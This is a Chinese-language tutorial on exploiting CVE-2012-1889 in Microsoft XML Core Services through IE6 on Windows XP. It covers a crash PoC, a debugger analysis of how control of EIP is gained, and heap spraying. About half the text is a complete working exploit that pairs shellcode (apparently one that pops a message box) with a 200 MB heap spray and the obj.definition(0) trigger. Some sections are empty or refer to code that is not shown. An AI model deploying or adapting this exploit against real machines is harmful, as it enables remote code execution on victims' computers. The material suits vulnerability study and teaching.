軟體名稱： Microsoft XML Core Services

軟體版本：XML 3.0/4.0/5.0/6.0

漏洞模組：msxml3.dll.

實驗系統：windows xp sp3

漏洞影響系統：windows XP/7/8/8.1

漏洞編號：CVE-2012-1889

危害等級：高危

漏洞型別：緩衝區溢位

威脅型別：遠端

1. 軟體簡介

    Microsoft XML Core Services (MSXML)是一組服務，可用JScript、VBScript、Microsoft開發工具編寫的應用構建基於XML的Windows-native應用。 

1. 漏洞成因

據CVE-2012-1889描述，

1. 利用過程

3.1漏洞觸發

1.Poc，網路上流傳的

<html>

<head>

    <title>CVE 2012-1889 PoC</title>

</head>

<body>

    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>

    <script>

        var obj = document.getElementById('poc').object;

        var src = unescape("%u0c0c%u0c0c");

        while (src.length < 0x1002) src += src;

        src = "\\\\xxx" + src;

        src = src.substr(0, 0x1000 - 10);

        var pic = document.createElement("img");

        pic.src = src;

        pic.nameProp;

        obj.definition(0);

    </script>

</body>

</html>

2.將上面的程式碼儲存為HTML檔案，並且用IE6開啟，並且在警告欄上允許允許阻止的內容，這時候IE瀏覽器就會崩潰

觸發漏洞的程式碼是JavaScript中最後一句，即第16行的obj.definition(0)。definition是DOM物件的一個屬性，而且是隻讀的屬性，不可以把屬性當作函式來使用並往裡面傳遞引數。

此時再次用IE開啟這個網頁，先不允許執行，先用windbg附加上去

輸入g讓程式跑起來，然後把警告的內容執行執行，讓程式觸發異常，斷在異常處。

在執行ecx，dword ptr[eax]的時候，eax的值是0x0C0C0C0C，在0x0C0C0C0C的位置上，並不可讀，所以觸發了一個異常訪問的異常，eax的值來自於ebp-14h記憶體處的值，在執行完對eax的賦值操作之後，程式比較了eax和ebx暫存器的內容，如果eax的內容為0就會跳轉，越過觸發異常的程式碼，但是PoC程式碼在棧上產生了大量的0c0c位元組，於是eax不為0，跳轉也不會執行。

如果要執行程式碼，就需要修改EIP暫存器的內容，call dword ptr [ecx+18h]處，這個地方剛好夠我們轉移EIP。

如果0x0C0C0C0C處存在可以讀的記憶體，那麼就不會觸發訪問異常的情況了，程式就會跳轉到0x0C0C0C0C+0x18處執行程式碼，如果在這裡放上我們構建好的程式碼，那麼漏洞觸發時，就可以執行了

3.2 HeapSpray

在使用HeapSpray的時候，一般會將EIP指向0x0C0C0C0C的位置上，然後利用JavaScript申請大量堆記憶體，並且用包含0x90和shellcode的記憶體覆蓋這些記憶體，通常，JavaScript會從記憶體的低地址向高地址分配記憶體，因此申請的記憶體超過200MB（200MB = 200*1024*1024 = 0x0C800000 > 0x0C0C0C0C）後，0x0C0C0C0C將被含有ShellCode的記憶體片覆蓋。只要記憶體片中的0×90能夠命中0x0C0C0C0C的位置，ShellCode就能最終得到執行。

3.1.1記憶體覆蓋程式碼

上面的程式碼分配了200個1M大小的記憶體塊，每個記憶體塊由shellcode和大量滑板指令0x90構成，其中shellcode位於每個記憶體塊的最末尾部分。

在觸發漏洞時，只需要有任意一個記憶體塊的任意一個滑板指令NOP可以覆蓋在0c0C0C0C0C上面，Shellcode最終都會被執行，使用1M作為記憶體塊的單位，可以使覆蓋成功的機率增加，如果尺寸太小，0x0C0C0C0C的位置可能會被Shellcode所覆蓋，這樣的話，溢位就失敗了。

3.3 漏洞攻擊實驗

1. PoC

 <html>

<head>

    <title>CVE 2012-1889 PoC v3 By:15PB.Com</title>

</head>

<body>

    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>

    <script>

    // 1.  準備好Shellcode（unescape()是解碼函式）

var cShellcode = unescape(

"\u8360\u20EC\u4CEB\u6547\u5074\u6F72\u4163\u6464" +

"\u6572\u7373\u6F4C\u6461\u694C\u7262\u7261\u4579" +

"\u4178\u5500\u6573\u3372\u2E32\u6C64\u006C\u654D" +

"\u7373\u6761\u4265\u786F\u0041\u7845\u7469\u7250" +

"\u636F\u7365\u0073\u6548\u6C6C\u206F\u3531\u4250" +

"\u0021\u00E8\u0000\u5B00\u8B64\u3035\u0000\u8B00" +

"\u0C76\u768B\u8B1C\u8B36\u0856\u5253\u12E8\u0000" +

"\u8B00\u8DF0\uBD4B\u5251\uD0FF\u5653\u5250\u6EE8" +

"\u0000\u5500\uEC8B\uEC83\u520C\u558B\u8B08\u3C72" +

"\u348D\u8B32\u7876\u348D\u8B32\u1C7E\u3C8D\u893A" +

"\uFC7D\u7E8B\u8D20\u3A3C\u7D89\u8BF8\u247E\u3C8D" +

"\u893A\uF47D\uC033\u01EB\u8B40\uF875\u348B\u8B86" +

"\u0855\u348D\u8B32\u0C5D\u7B8D\uB9AF\u000E\u0000" +

"\uF3FC\u75A6\u8BE3\uF475\uFF33\u8B66\u463C\u558B" +

"\u8BFC\uBA34\u558B\u8D08\u3204\u8B5A\u5DE5\u08C2" +

"\u5500\uEC8B\uEC83\u8B08\u145D\u4B8D\u6ACC\u6A00" +

"\u5100\u55FF\u8D0C\uD74B\u5051\u55FF\u8910\uFC45" +

"\u4B8D\u51E3\u75FF\uFF08\u1055\u4589\u8DF8\uEF4B" +

"\u006A\u5151\u006A\u55FF\u6AFC\uFF00\uF855\uE58B" +

"\uC25D\u0010\u0000");

// 2.  製作一塊劃板資料

// 2.1 計算填充劃板指令資料的大小（都除2是因為length返回的是Unicode的字元個數）

var nSlideSize      = 1024*1024 / 2;     // 一個劃板指令區的大小（1MB）

var nMlcHadSize     = 32        / 2;     // 堆頭部大小

var nStrLenSize     = 4         / 2;     // 堆長度資訊大小

var nTerminatorSize = 2         / 2;     // 堆結尾符號大小

var nScSize         = cShellcode.length; // Shellcode大小

var nFillSize       = nSlideSize-nMlcHadSize-nStrLenSize-nScSize-nTerminatorSize;

// 2.2 填充劃板指令，製作好一塊填充資料

var cFillData  = unescape("\u0C0C\u0C0C"); // 劃板指令0C0C   OR AL,0C

var cSlideData = new Array();              // 申請一個數組物件用於儲存劃板資料

while (cFillData.length <= nSlideSize)

cFillData += cFillData;

cFillData = cFillData.substring(0, nFillSize);

// 3.  填充200MB的記憶體區域（申請200塊1MB大小的劃板資料區），試圖覆蓋0x0C0C0C0C

//     區域，每塊劃板資料均由 劃板資料+Shellcode組成，這樣只要任意一塊劃板資料

//     正好落在0x0C0C0C0C處，大量無用的“OR AL,0C”就會將執行流程引到劃板資料區

//     後面的Shellcode處，進而執行Shellcode。

for (var i = 0; i < 200; i++)

cSlideData[i] = cFillData + cShellcode;

    // 4.  觸發CVE 2012-1889漏洞

// 4.1 獲取名為15PB的XML物件，並將其儲存到名為obj15PB例項中

        var obj15PB = document.getElementById('15PB').object;

// 4.2 構建一個長度為0x1000-10=8182，起始內容為“\\15PB_Com”位元組的資料

        var srcImgPath = unescape("\u0C0C\u0C0C");

        while (srcImgPath.length < 0x1000)

            srcImgPath += srcImgPath;

        srcImgPath = "\\\\15PB_Com" + srcImgPath;

        srcImgPath = srcImgPath.substr(0, 0x1000-10);

        // 4.3 建立一個圖片元素，並將圖片源路徑設為srcImgPath，並返回當前圖片檔名

        var emtPic = document.createElement("img");

        emtPic.src = srcImgPath;

        emtPic.nameProp;

        // 4.4 定義物件obj15PB（觸發溢位）

        obj15PB.definition(0);

    </script>

</body>

</html>

5.參考資料

CSDN部落格

《軟體除錯》張銀奎 著

《0day安全：軟體漏洞分析技術（第2版）》 王清 著